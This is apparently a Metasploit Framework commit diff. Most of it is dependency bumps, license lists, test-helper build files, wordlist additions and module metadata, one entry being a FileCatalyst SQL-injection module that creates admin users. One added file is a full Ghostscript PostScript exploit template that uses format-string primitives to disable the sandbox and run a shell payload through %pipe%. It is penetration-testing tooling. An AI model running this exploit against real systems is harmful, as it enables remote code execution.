@@ -442,7 +462,7 @@ GEM
    rspec-expectations (3.13.0)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.13.0)
-    rspec-mocks (3.13.0)
+    rspec-mocks (3.13.1)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.13.0)
    rspec-rails (6.1.2)
@@ -456,7 +476,7 @@ GEM
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
    rspec-support (3.13.1)
-    rubocop (1.63.2)
+    rubocop (1.64.1)
      json (~> 2.3)
      language_server-protocol (>= 3.17.0)
      parallel (~> 1.10)
@@ -467,21 +487,22 @@ GEM
      rubocop-ast (>= 1.31.1, < 2.0)
      ruby-progressbar (~> 1.7)
      unicode-display_width (>= 2.4.0, < 3.0)
-    rubocop-ast (1.31.2)
-      parser (>= 3.3.0.4)
+    rubocop-ast (1.31.3)
+      parser (>= 3.3.1.0)
    ruby-macho (4.0.1)
    ruby-mysql (4.1.0)
    ruby-prof (1.4.2)
    ruby-progressbar (1.13.0)
    ruby-rc4 (0.1.5)
    ruby2_keywords (0.0.5)
-    ruby_smb (3.3.7)
+    ruby_smb (3.3.9)
      bindata (= 2.4.15)
      openssl-ccm
      openssl-cmac
      rubyntlm
      windows_error (>= 0.1.4)
-    rubyntlm (0.6.3)
+    rubyntlm (0.6.4)
+      base64
    rubyzip (2.3.2)
    sawyer (0.9.2)
      addressable (>= 2.3.5)
@@ -490,27 +511,27 @@ GEM
      docile (~> 1.1)
      simplecov-html (~> 0.11)
    simplecov-html (0.12.3)
-    simpleidn (0.2.1)
-      unf (~> 0.1.4)
+    simpleidn (0.2.3)
    sinatra (3.2.0)
      mustermann (~> 3.0)
      rack (~> 2.2, >= 2.2.4)
      rack-protection (= 3.2.0)
      tilt (~> 2.0)
-    sqlite3 (1.6.6)
+    sqlite3 (1.7.3)
      mini_portile2 (~> 2.8.0)
    sshkey (3.0.0)
    strptime (0.2.5)
+    strscan (3.1.0)
    swagger-blocks (3.0.0)
    systemu (2.6.5)
-    test-prof (1.3.2)
+    test-prof (1.3.3)
    thin (1.8.2)
      daemons (~> 1.0, >= 1.0.9)
      eventmachine (~> 1.0, >= 1.0.4)
      rack (>= 1, < 3)
    thor (1.3.1)
    tilt (2.3.0)
-    timecop (0.9.8)
+    timecop (0.9.9)
    timeout (0.4.1)
    ttfunk (1.8.0)
      bigdecimal (~> 3.1)
@@ -518,9 +539,6 @@ GEM
      concurrent-ruby (~> 1.0)
    tzinfo-data (1.2024.1)
      tzinfo (>= 1.0.0)
-    unf (0.1.4)
-      unf_ext
-    unf_ext (0.0.8.2)
    unicode-display_width (2.5.0)
    unix-crypt (1.3.1)
    uuid (2.3.9)
@@ -548,7 +566,7 @@ GEM
    xmlrpc (0.3.3)
      webrick
    yard (0.9.36)
-    zeitwerk (2.6.13)
+    zeitwerk (2.6.15)

 PLATFORMS
  ruby
@@ -1,30 +1,32 @@
 This file is auto-generated by tools/dev/update_gem_licenses.sh
-Ascii85, 1.1.0, MIT
-actionpack, 7.0.8.1, MIT
-actionview, 7.0.8.1, MIT
-activemodel, 7.0.8.1, MIT
-activerecord, 7.0.8.1, MIT
-activesupport, 7.0.8.1, MIT
+Ascii85, 1.1.1, MIT
+aarch64, 2.1.0, "Apache 2.0"
+abbrev, 0.1.2, "ruby, Simplified BSD"
+actionpack, 7.0.8.4, MIT
+actionview, 7.0.8.4, MIT
+activemodel, 7.0.8.4, MIT
+activerecord, 7.0.8.4, MIT
+activesupport, 7.0.8.4, MIT
 addressable, 2.8.6, "Apache 2.0"
 afm, 0.2.2, MIT
-allure-rspec, 2.24.3, "Apache 2.0"
-allure-ruby-commons, 2.24.3, "Apache 2.0"
+allure-rspec, 2.24.5, "Apache 2.0"
+allure-ruby-commons, 2.24.5, "Apache 2.0"
 arel-helpers, 2.14.0, MIT
 ast, 2.4.2, MIT
 aws-eventstream, 1.3.0, "Apache 2.0"
-aws-partitions, 1.915.0, "Apache 2.0"
-aws-sdk-core, 3.192.0, "Apache 2.0"
-aws-sdk-ec2, 1.450.0, "Apache 2.0"
-aws-sdk-ec2instanceconnect, 1.38.0, "Apache 2.0"
-aws-sdk-iam, 1.96.0, "Apache 2.0"
-aws-sdk-kms, 1.79.0, "Apache 2.0"
-aws-sdk-s3, 1.147.0, "Apache 2.0"
-aws-sdk-ssm, 1.166.0, "Apache 2.0"
+aws-partitions, 1.941.0, "Apache 2.0"
+aws-sdk-core, 3.197.0, "Apache 2.0"
+aws-sdk-ec2, 1.460.0, "Apache 2.0"
+aws-sdk-ec2instanceconnect, 1.41.0, "Apache 2.0"
+aws-sdk-iam, 1.99.0, "Apache 2.0"
+aws-sdk-kms, 1.83.0, "Apache 2.0"
+aws-sdk-s3, 1.152.0, "Apache 2.0"
+aws-sdk-ssm, 1.170.0, "Apache 2.0"
 aws-sigv4, 1.8.0, "Apache 2.0"
 base64, 0.2.0, "ruby, Simplified BSD"
 bcrypt, 3.1.20, MIT
-bcrypt_pbkdf, 1.1.0, MIT
-bigdecimal, 3.1.7, "ruby, Simplified BSD"
+bcrypt_pbkdf, 1.1.1, MIT
+bigdecimal, 3.1.8, "ruby, Simplified BSD"
 bindata, 2.4.15, "Simplified BSD"
 bootsnap, 1.18.3, MIT
 bson, 5.0.0, "Apache 2.0"
@@ -33,9 +35,10 @@ bundler, 2.1.4, MIT
 byebug, 11.1.3, "Simplified BSD"
 chunky_png, 1.4.0, MIT
 coderay, 1.1.3, MIT
-concurrent-ruby, 1.2.3, MIT
+concurrent-ruby, 1.3.1, MIT
 cookiejar, 0.3.4, "Simplified BSD"
 crass, 1.0.6, MIT
+csv, 3.3.0, "ruby, Simplified BSD"
 daemons, 1.4.1, MIT
 date, 3.3.4, "ruby, Simplified BSD"
 debug, 1.8.0, "ruby, Simplified BSD"
@@ -43,6 +46,7 @@ diff-lcs, 1.5.1, "MIT, Artistic-2.0, GPL-2.0-or-later"
 dnsruby, 1.72.1, "Apache 2.0"
 docile, 1.4.0, MIT
 domain_name, 0.6.20240107, "Simplified BSD, New BSD, Mozilla Public License 2.0"
+drb, 2.2.1, "ruby, Simplified BSD"
 ed25519, 1.3.0, MIT
 em-http-request, 1.1.7, MIT
 em-socksify, 0.3.2, MIT
@@ -50,7 +54,7 @@ erubi, 1.12.0, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
 factory_bot, 6.4.6, MIT
 factory_bot_rails, 6.4.3, MIT
-faker, 3.3.1, MIT
+faker, 3.4.1, MIT
 faraday, 2.7.11, MIT
 faraday-net_http, 3.0.2, MIT
 faraday-retry, 2.2.1, MIT
@@ -58,15 +62,16 @@ faye-websocket, 0.11.3, "Apache 2.0"
 ffi, 1.16.3, "New BSD"
 filesize, 0.2.0, MIT
 fivemat, 1.3.7, MIT
+getoptlong, 0.2.1, "ruby, Simplified BSD"
 gssapi, 1.3.1, MIT
 gyoku, 1.4.0, MIT
 hashery, 2.1.2, "Simplified BSD"
 hrr_rb_ssh, 0.4.2, "Apache 2.0"
 hrr_rb_ssh-ed25519, 0.4.2, "Apache 2.0"
-http-cookie, 1.0.5, MIT
+http-cookie, 1.0.6, MIT
 http_parser.rb, 0.8.0, MIT
 httpclient, 2.8.3, ruby
-i18n, 1.14.4, MIT
+i18n, 1.14.5, MIT
 io-console, 0.7.2, "ruby, Simplified BSD"
 irb, 1.7.4, "ruby, Simplified BSD"
 jmespath, 1.6.2, "Apache 2.0"
@@ -74,37 +79,39 @@ jsobfu, 0.4.2, "New BSD"
 json, 2.7.2, ruby
 language_server-protocol, 3.17.0.3, MIT
 little-plugger, 1.1.4, MIT
-logging, 2.3.1, MIT
+logging, 2.4.0, MIT
 loofah, 2.22.0, MIT
 macaddr, 1.7.2, ruby
 memory_profiler, 1.0.1, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 5.0.2, "New BSD"
 metasploit-credential, 6.0.9, "New BSD"
-metasploit-framework, 6.4.7, "New BSD"
+metasploit-framework, 6.4.23, "New BSD"
 metasploit-model, 5.0.2, "New BSD"
 metasploit-payloads, 2.0.166, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 6.0.3, "New BSD"
-metasploit_payloads-mettle, 1.0.26, "3-clause (or ""modified"") BSD"
+metasploit_payloads-mettle, 1.0.31, "3-clause (or ""modified"") BSD"
 method_source, 1.1.0, MIT
 mime-types, 3.5.2, MIT
-mime-types-data, 3.2024.0305, MIT
-mini_portile2, 2.8.6, MIT
-minitest, 5.22.3, MIT
+mime-types-data, 3.2024.0604, MIT
+mini_portile2, 2.8.7, MIT
+minitest, 5.23.1, MIT
 mqtt, 0.6.0, MIT
 msgpack, 1.6.1, "Apache 2.0"
 multi_json, 1.15.0, MIT
 mustermann, 3.0.0, MIT
+mutex_m, 0.2.0, "ruby, Simplified BSD"
 nessus_rest, 0.1.6, MIT
-net-imap, 0.4.10, "ruby, Simplified BSD"
+net-imap, 0.4.12, "ruby, Simplified BSD"
 net-ldap, 0.19.0, MIT
 net-protocol, 0.2.2, "ruby, Simplified BSD"
+net-sftp, 4.0.0, MIT
 net-smtp, 0.5.0, "ruby, Simplified BSD"
 net-ssh, 7.2.3, MIT
 network_interface, 0.0.4, MIT
 nexpose, 7.3.0, "New BSD"
-nio4r, 2.7.1, "MIT, Simplified BSD"
-nokogiri, 1.14.5, MIT
+nio4r, 2.7.3, "MIT, Simplified BSD"
+nokogiri, 1.16.5, MIT
 nori, 2.7.0, MIT
 octokit, 4.25.1, MIT
 openssl-ccm, 1.2.3, MIT
@@ -112,34 +119,34 @@ openssl-cmac, 2.0.2, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 2.0.0, "New BSD"
 parallel, 1.24.0, MIT
-parser, 3.3.0.5, MIT
+parser, 3.3.2.0, MIT
 patch_finder, 1.0.2, "New BSD"
-pcaprub, 0.13.1, LGPL-2.1
+pcaprub, 0.13.3, LGPL-2.1
 pdf-reader, 2.12.0, MIT
 pg, 1.5.6, "Simplified BSD"
 pry, 0.14.2, MIT
 pry-byebug, 3.10.1, MIT
 public_suffix, 5.0.5, MIT
 puma, 6.4.2, "New BSD"
-racc, 1.7.3, "ruby, Simplified BSD"
+racc, 1.8.0, "ruby, Simplified BSD"
 rack, 2.2.9, MIT
 rack-protection, 3.2.0, MIT
 rack-test, 2.1.0, MIT
 rails-dom-testing, 2.2.0, MIT
 rails-html-sanitizer, 1.6.0, MIT
-railties, 7.0.8.1, MIT
+railties, 7.0.8.4, MIT
 rainbow, 3.1.1, MIT
 rake, 13.2.1, MIT
 rasn1, 0.13.0, MIT
 rb-readline, 0.5.5, BSD
 recog, 3.1.5, unknown
 redcarpet, 3.6.0, MIT
-regexp_parser, 2.9.0, MIT
-reline, 0.5.2, ruby
+regexp_parser, 2.9.2, MIT
+reline, 0.5.8, ruby
 require_all, 3.0.0, MIT
 rex-arch, 0.1.15, "New BSD"
 rex-bin_tools, 0.1.9, "New BSD"
-rex-core, 0.1.31, "New BSD"
+rex-core, 0.1.32, "New BSD"
 rex-encoder, 0.1.7, "New BSD"
 rex-exploitation, 0.1.39, "New BSD"
 rex-java, 0.1.7, "New BSD"
@@ -147,55 +154,54 @@ rex-mime, 0.1.8, "New BSD"
 rex-nop, 0.1.3, "New BSD"
 rex-ole, 0.1.8, "New BSD"
 rex-powershell, 0.1.99, "New BSD"
-rex-random_identifier, 0.1.11, "New BSD"
+rex-random_identifier, 0.1.12, "New BSD"
 rex-registry, 0.1.5, "New BSD"
 rex-rop_builder, 0.1.5, "New BSD"
 rex-socket, 0.1.57, "New BSD"
 rex-sslscan, 0.1.10, "New BSD"
 rex-struct2, 0.1.4, "New BSD"
-rex-text, 0.2.57, "New BSD"
+rex-text, 0.2.58, "New BSD"
 rex-zip, 0.1.5, "New BSD"
-rexml, 3.2.6, "Simplified BSD"
+rexml, 3.2.8, "Simplified BSD"
 rkelly-remix, 0.0.7, MIT
 rspec, 3.13.0, MIT
 rspec-core, 3.13.0, MIT
 rspec-expectations, 3.13.0, MIT
-rspec-mocks, 3.13.0, MIT
+rspec-mocks, 3.13.1, MIT
 rspec-rails, 6.1.2, MIT
 rspec-rerun, 1.1.0, MIT
 rspec-support, 3.13.1, MIT
-rubocop, 1.63.2, MIT
-rubocop-ast, 1.31.2, MIT
+rubocop, 1.64.1, MIT
+rubocop-ast, 1.31.3, MIT
 ruby-macho, 4.0.1, MIT
 ruby-mysql, 4.1.0, MIT
 ruby-prof, 1.4.2, "Simplified BSD"
 ruby-progressbar, 1.13.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.3.5, "New BSD"
-rubyntlm, 0.6.3, MIT
+ruby_smb, 3.3.9, "New BSD"
+rubyntlm, 0.6.4, MIT
 rubyzip, 2.3.2, "Simplified BSD"
 sawyer, 0.9.2, MIT
 simplecov, 0.18.2, MIT
 simplecov-html, 0.12.3, MIT
-simpleidn, 0.2.1, MIT
+simpleidn, 0.2.3, MIT
 sinatra, 3.2.0, MIT
-sqlite3, 1.6.6, "New BSD"
+sqlite3, 1.7.3, "New BSD"
 sshkey, 3.0.0, MIT
 strptime, 0.2.5, "Simplified BSD"
+strscan, 3.1.0, "ruby, Simplified BSD"
 swagger-blocks, 3.0.0, MIT
 systemu, 2.6.5, ruby
-test-prof, 1.3.2, MIT
+test-prof, 1.3.3, MIT
 thin, 1.8.2, "GPL-2.0+, ruby"
 thor, 1.3.1, MIT
 tilt, 2.3.0, MIT
-timecop, 0.9.8, MIT
+timecop, 0.9.9, MIT
 timeout, 0.4.1, "ruby, Simplified BSD"
 ttfunk, 1.8.0, "Nonstandard, GPL-2.0-only, GPL-3.0-only"
 tzinfo, 2.0.6, MIT
 tzinfo-data, 1.2024.1, MIT
-unf, 0.1.4, "2-clause BSDL"
-unf_ext, 0.0.9.1, MIT
 unicode-display_width, 2.5.0, MIT
 unix-crypt, 1.3.1, 0BSD
 uuid, 2.3.9, MIT
@@ -209,4 +215,4 @@ winrm, 2.3.6, "Apache 2.0"
 xdr, 3.0.3, "Apache 2.0"
 xmlrpc, 0.3.3, "ruby, Simplified BSD"
 yard, 0.9.36, MIT
-zeitwerk, 2.6.13, MIT
+zeitwerk, 2.6.15, MIT
@@ -0,0 +1,33 @@
+## Setup
+
+This contains setup steps used for acceptance testing of the `cmd_exec` API. We will make use of the gcc docker image to 
+build out the C binaries to then be uploaded to the host machine, so they can be used as part of the `cmd_exec` 
+create process API.
+
+This directory contains:
+- C executable `show_args.c`
+This file is used as part of the `cmd_exec` testing as it requires a file to take args, then loop over them and output 
+those args back to the user.
+
+- Makefile to build the binaries `makefile.mk`
+This file is used to create the binaries for both Windows and Linux that the docker command below will make use of.
+
+- Precompiled binaries for Windows
+  - `show_args.exe`
+
+- Precompiled binaries for Linux and Mettle
+  - `show_args`
+
+- Precompiled binaries for macOS
+  - `show_args_macos`
+
+## Compile binaries locally
+
+We make use of gcc for this: https://hub.docker.com/_/gcc
+
+- Run:
+```shell
+docker run --rm -v "$PWD":/usr/src/myapp -w /usr/src/myapp gcc:11.4.0 /bin/bash -c "apt update && apt install -y gcc-mingw-w64 && make all -f makefile.mk"
+```
+
+You will need to compile the OSX payload separately on an OSX machine, Docker is not supported.
@@ -0,0 +1,5 @@
+all: show_args_linux show_args_windows
+show_args_linux: show_args.c
+	cc show_args.c -o show_args_linux
+show_args_windows: show_args.c
+	x86_64-w64-mingw32-gcc show_args.c -o show_args.exe
@@ -0,0 +1,7 @@
+int printf(const char *format, ...);
+
+int main(int argc, char *argv[]) {
+    for (int i = 0; i < argc; i++) {
+        printf("%s\n", argv[i]);
+    }
+}
@@ -0,0 +1,297 @@
+%!PS-Adobe-3.0 EPSF-3.0
+%%Pages: 1
+%%BoundingBox:   36   36  576  756
+%%LanguageLevel: 1
+%%EndComments
+%%BeginProlog
+%%EndProlog
+
+% Make sure to restore the original `setpagedevice` from userdict or systemdict
+% in case it has been redefined in another postscript file.
+% This happens with ImageMagick for example.
+userdict begin
+systemdict /setpagedevice known
+{
+        /setpagedevice systemdict /setpagedevice get def
+}
+if
+end
+
+% ====== Configuration ======
+
+% Offset of `gp_file *out` on the stack
+/IdxOutPtr MSF_IDXOUTPTR  def
+
+
+% ====== General Postscript utility functions ======
+
+% from: https://github.com/scriptituk/pslutils/blob/master/string.ps
+/cat {
+	exch
+	dup length 2 index length add string
+	dup dup 5 2 roll
+	copy length exch putinterval
+} bind def
+
+% from: https://rosettacode.org/wiki/Repeat_a_string#PostScript
+/times {
+  dup length dup    % rcount ostring olength olength
+  4 3 roll          % ostring olength olength rcount
+  mul dup string    % ostring olength flength fstring
+  4 1 roll          % fstring ostring olength flength
+  1 sub 0 3 1 roll  % fstring ostring 0 olength flength_minus_one 
+  {                 % fstring ostring iter
+    1 index 3 index % fstring ostring iter ostring fstring
+    3 1 roll        % fstring ostring fstring iter ostring
+    putinterval     % fstring ostring
+  } for
+  pop               % fstring
+} def
+
+% Printing helpers
+% /println { print (\012) print } bind def
+% /printnumln { =string cvs println } bind def
+
+% ====== Start of exploit helper code ======
+
+% Make a new tempfile but only save its path. This gives us a file path to read/write 
+% which will exist as long as this script runs. We don't actually use the file object
+% (hence `pop`) because we're passing the path to uniprint and reopening it ourselves.
+/PathTempFile () (w+) .tempfile pop def
+
+
+% Convert hex string "4142DEADBEEF" to padded little-endian byte string <EFBEADDE42410000>
+% <HexStr> str_ptr_to_le_bytes <ByteStringLE>
+/str_ptr_to_le_bytes {
+	% Convert hex string argument to Postscript string
+	% using <DEADBEEF> notation
+	/ArgBytes exch (<) exch (>) cat cat token pop exch pop def
+
+	% Prepare resulting string (`string` fills with zeros)
+	/Res 8 string def
+
+	% For every byte in the input
+	0 1 ArgBytes length 1 sub {
+		/i exch def
+
+		% put byte at index (len(ArgBytes) - 1 - i)
+		Res ArgBytes length 1 sub i sub ArgBytes i get put
+	} for
+
+	Res % return
+} bind def
+
+
+% <StackString> <FmtString> do_uniprint <LeakedData>
+/do_uniprint {
+	/FmtString exch def
+	/StackString exch def
+
+	% Select uniprint device with our payload
+	<<
+		/OutputFile PathTempFile
+		/OutputDevice /uniprint
+		/upColorModel /DeviceCMYKgenerate
+		/upRendering /FSCMYK32
+		/upOutputFormat /Pcl
+		/upOutputWidth 99999
+		/upWriteComponentCommands {(x)(x)(x)(x)} % This is required, just put bogus strings
+		/upYMoveCommand FmtString
+	>>
+	setpagedevice
+
+	% Manipulate the interpreter to put a recognizable piece of data on the stack
+	(%%__) StackString cat .runstring
+
+	% Produce a page with some content to trigger uniprint logic
+	newpath 1 1 moveto 1 2 lineto 1 setlinewidth stroke
+	showpage
+
+	% Read back the written data
+	/InFile PathTempFile (r) file def
+	/LeakedData InFile 4096 string readstring pop def
+	InFile closefile
+
+	LeakedData % return
+} bind def
+
+
+% get_index_of_controllable_stack <Idx>
+/get_index_of_controllable_stack {
+	% A recognizable token on the stack to search for
+	/SearchToken (ABABABAB) def
+
+	% Construct "1:%lx,2:%lx,3:%lx,...,400:%lx,"
+	/FmtString 0 string 1 1 400 { 3 string cvs (:%lx,) cat cat } for def
+
+	SearchToken FmtString do_uniprint
+
+	% Search for ABABABAB => 4241424142414241 (assume LE)
+	(4241424142414241) search {
+		exch pop
+		exch pop
+		% <pre> is left
+
+		% Search for latest comma in <pre> to get e.g. `123:` as <post>
+		(,) rsearch pop pop pop
+
+		% Search for colon and use <pre> to get `123`
+		(:) search pop exch pop exch pop
+
+		% return as int
+		cvi
+	} {
+		% (Could not find our data on the stack.. exiting) println
+		quit
+	} ifelse
+} bind def
+
+
+% <StackIdx> <AddrHex> write_to
+/write_to {
+	/AddrHex exch str_ptr_to_le_bytes def % address to write to
+	/StackIdx exch def % stack idx to use
+
+	/FmtString StackIdx 1 sub (%x) times (_%ln) cat def
+
+	AddrHex FmtString do_uniprint
+
+	pop % we don't care about formatted data
+} bind def
+
+
+% <StackIdx> read_ptr_at <PtrHexStr>
+/read_ptr_at {
+	/StackIdx exch def % stack idx to use
+
+	/FmtString StackIdx 1 sub (%x) times (__%lx__) cat def
+
+	() FmtString do_uniprint
+
+	(__) search pop pop pop (__) search pop exch pop exch pop
+} bind def
+
+
+% num_bytes <= 9
+% <StackIdx> <PtrHex> <NumBytes> read_dereferenced_bytes_at <ResultAsMultipliedInt>
+/read_dereferenced_bytes_at {
+	/NumBytes exch def
+	/PtrHex exch def
+	/PtrOct PtrHex str_ptr_to_le_bytes def % address to read from
+	/StackIdx exch def % stack idx to use
+
+	/FmtString StackIdx 1 sub (%x) times (__%.) NumBytes 1 string cvs cat (s__) cat cat def
+
+	PtrOct FmtString do_uniprint
+
+	/Data exch (__) search pop pop pop (__) search pop exch pop exch pop def
+
+	% Check if we were able to read all bytes
+	Data length NumBytes eq {
+		% Yes we did! So return the integer conversion of the bytes
+		0 % accumulator
+		NumBytes 1 sub -1 0 {
+			exch % <i> <accum>
+			256 mul exch % <accum*256> <i>
+			Data exch get % <accum*256> <Data[i]>
+			add % <accum*256 + Data[i]>
+		} for
+	} {
+		% We did not read all bytes, add a null byte and recurse on addr+1
+		StackIdx 1 PtrHex ptr_add_offset NumBytes 1 sub read_dereferenced_bytes_at
+		256 mul
+	} ifelse
+} bind def
+
+
+% <StackIdx> <AddrHex> read_dereferenced_ptr_at <PtrHexStr>
+/read_dereferenced_ptr_at {
+	% Read 6 bytes
+	6 read_dereferenced_bytes_at
+
+	% Convert to hex string and return
+	16 12 string cvrs
+} bind def
+
+
+% <Offset> <PtrHexStr> ptr_add_offset <PtrHexStr>
+/ptr_add_offset {
+	/PtrHexStr exch def % hex string pointer
+	/Offset exch def % integer to add
+
+	/PtrNum (16#) PtrHexStr cat cvi def
+
+	% base 16, string length 12
+	PtrNum Offset add 16 12 string cvrs
+} bind def
+
+
+% () println
+
+% ====== Start of exploit logic ======
+
+
+% Find out the index of the controllable bytes
+% This is around the 200-300 range but differs per binary/version
+/IdxStackControllable get_index_of_controllable_stack def
+% (Found controllable stack region at index: ) print IdxStackControllable printnumln
+
+% Exploit steps:
+% - `gp_file *out` is at stack index `IdxOutPtr`.
+%
+% - Controllable data is at index `IdxStackControllable`.
+%
+% - We want to find out the address of:
+%       out->memory->gs_lib_ctx->core->path_control_active
+%   hence we need to dereference and add ofsets a few times
+%
+% - Once we have the address of `path_control_active`, we use
+%   our write primitive to write an integer to its address - 3
+%   such that the most significant bytes (zeros) of that integer
+%   overwrite `path_control_active`, setting it to 0.
+%
+% - Finally, with `path_control_active` disabled, we can use
+%   the built-in (normally sandboxed) `%pipe%` functionality to
+%   run shell commands
+
+
+/PtrOut IdxOutPtr read_ptr_at def
+
+% (out: 0x) PtrOut cat println
+
+
+% memory is at offset 144 in out
+/PtrOutOffset 144 PtrOut ptr_add_offset def
+/PtrMem IdxStackControllable PtrOutOffset read_dereferenced_ptr_at def
+
+% (out->mem: 0x) PtrMem cat println
+
+% gs_lib_ctx is at offset 208 in memory
+/PtrMemOffset 208 PtrMem ptr_add_offset def
+/PtrGsLibCtx IdxStackControllable PtrMemOffset read_dereferenced_ptr_at def
+
+% (out->mem->gs_lib_ctx: 0x) PtrGsLibCtx cat println
+
+% core is at offset 8 in gs_lib_ctx
+/PtrGsLibCtxOffset 8 PtrGsLibCtx ptr_add_offset def
+/PtrCore IdxStackControllable PtrGsLibCtxOffset read_dereferenced_ptr_at def
+
+% (out->mem->gs_lib_ctx->core: 0x) PtrCore cat println
+
+% path_control_active is at offset 156 in core
+/PtrPathControlActive 156 PtrCore ptr_add_offset def
+
+% (out->mem->gs_lib_ctx->core->path_control_active: 0x) PtrPathControlActive cat println
+
+% Subtract a bit from the address to make sure we write a null over the field
+/PtrTarget -3 PtrPathControlActive ptr_add_offset def
+
+% And overwrite it!
+IdxStackControllable PtrTarget write_to
+
+
+% And now `path_control_active` == 0, so we can use %pipe%
+
+(%pipe%MSF_PAYLOAD) (r) file
+
+quit
@@ -61,3 +61,4 @@ woocommerce-payments
 file-manager-advanced-shortcode
 royal-elementor-addons
 backup-backup
+hash-form
@@ -34566,6 +34566,7 @@ hash-comment-ip
 hash-converter
 hash-coupon
 hash-elements
+hash-form
 hash-hash-tags
 hash-link-scroll-offset
 hashbar-wp-notification-bar
@@ -2233,6 +2233,69 @@

    ]
  },
+  "auxiliary_admin/http/fortra_filecatalyst_workflow_sqli": {
+    "name": "Fortra FileCatalyst Workflow SQL Injection (CVE-2024-5276)",
+    "fullname": "auxiliary/admin/http/fortra_filecatalyst_workflow_sqli",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2024-06-25",
+    "type": "auxiliary",
+    "author": [
+      "Tenable",
+      "Michael Heinzl"
+    ],
+    "description": "This module exploits a SQL injection vulnerability in Fortra FileCatalyst Workflow <= v5.1.6 Build 135, by adding a new\n          administrative user to the web interface of the application.",
+    "references": [
+      "CVE-2024-5276",
+      "URL-https://www.tenable.com/security/research/tra-2024-25",
+      "URL-https://support.fortra.com/filecatalyst/kb-articles/advisory-6-24-2024-filecatalyst-workflow-sql-injection-vulnerability-YmYwYWY4OTYtNTUzMi1lZjExLTg0MGEtNjA0NWJkMDg3MDA0"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 8080,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2024-08-16 14:12:41 +0000",
+    "path": "/modules/auxiliary/admin/http/fortra_filecatalyst_workflow_sqli.rb",
+    "is_install_path": true,
+    "ref_name": "admin/http/fortra_filecatalyst_workflow_sqli",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "config-changes"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
  "auxiliary_admin/http/gitlab_password_reset_account_takeover": {
    "name": "GitLab Password Reset Account Takeover",
    "fullname": "auxiliary/admin/http/gitlab_password_reset_account_takeover",
@@ -3753,7 +3816,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2023-09-15 16:35:55 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "admin/http/netgear_pnpx_getsharefolderlist_auth_bypass",
@@ -3823,7 +3886,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2023-09-15 16:35:55 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb",
    "is_install_path": true,
    "ref_name": "admin/http/netgear_r6700_pass_reset",
@@ -6416,7 +6479,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-03-07 13:28:22 +0000",
+    "mod_time": "2024-05-02 13:57:13 +0000",
    "path": "/modules/auxiliary/admin/ldap/ad_cs_cert_template.rb",
    "is_install_path": true,
    "ref_name": "admin/ldap/ad_cs_cert_template",
@@ -6438,7 +6501,9 @@
        "Certipy"
      ]
    },
-    "session_types": false,
+    "session_types": [
+      "ldap"
+    ],
    "needs_cleanup": false,
    "actions": [
      {
@@ -6489,7 +6554,7 @@

    ],
    "targets": null,
-    "mod_time": "2023-02-24 13:50:04 +0000",
+    "mod_time": "2024-05-02 13:57:13 +0000",
    "path": "/modules/auxiliary/admin/ldap/rbcd.rb",
    "is_install_path": true,
    "ref_name": "admin/ldap/rbcd",
@@ -6507,7 +6572,9 @@

      ]
    },
-    "session_types": false,
+    "session_types": [
+      "ldap"
+    ],
    "needs_cleanup": false,
    "actions": [
      {
@@ -6556,7 +6623,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-04-09 07:53:26 +0000",
+    "mod_time": "2024-05-02 13:57:13 +0000",
    "path": "/modules/auxiliary/admin/ldap/shadow_credentials.rb",
    "is_install_path": true,
    "ref_name": "admin/ldap/shadow_credentials",
@@ -6574,7 +6641,9 @@

      ]
    },
-    "session_types": false,
+    "session_types": [
+      "ldap"
+    ],
    "needs_cleanup": false,
    "actions": [
      {
@@ -6627,12 +6696,12 @@

    ],
    "targets": null,
-    "mod_time": "2023-10-12 19:08:51 +0000",
+    "mod_time": "2024-05-02 13:57:13 +0000",
    "path": "/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "admin/ldap/vmware_vcenter_vmdir_auth_bypass",
    "check": true,
-    "post_auth": false,
+    "post_auth": true,
    "default_credential": false,
    "notes": {
      "Stability": [
@@ -6646,7 +6715,9 @@

      ]
    },
-    "session_types": false,
+    "session_types": [
+      "ldap"
+    ],
    "needs_cleanup": false,
    "actions": [
      {
@@ -6903,7 +6974,7 @@
      "sybase"
    ],
    "targets": null,
-    "mod_time": "2024-02-19 10:57:53 +0000",
+    "mod_time": "2024-03-05 13:27:00 +0000",
    "path": "/modules/auxiliary/admin/mssql/mssql_enum.rb",
    "is_install_path": true,
    "ref_name": "admin/mssql/mssql_enum",
@@ -7104,7 +7175,7 @@
      "sybase"
    ],
    "targets": null,
-    "mod_time": "2024-02-19 10:34:16 +0000",
+    "mod_time": "2024-03-05 13:27:00 +0000",
    "path": "/modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb",
    "is_install_path": true,
    "ref_name": "admin/mssql/mssql_escalate_dbowner",
@@ -7205,7 +7276,7 @@
      "sybase"
    ],
    "targets": null,
-    "mod_time": "2024-02-14 15:26:34 +0000",
+    "mod_time": "2024-03-05 13:27:00 +0000",
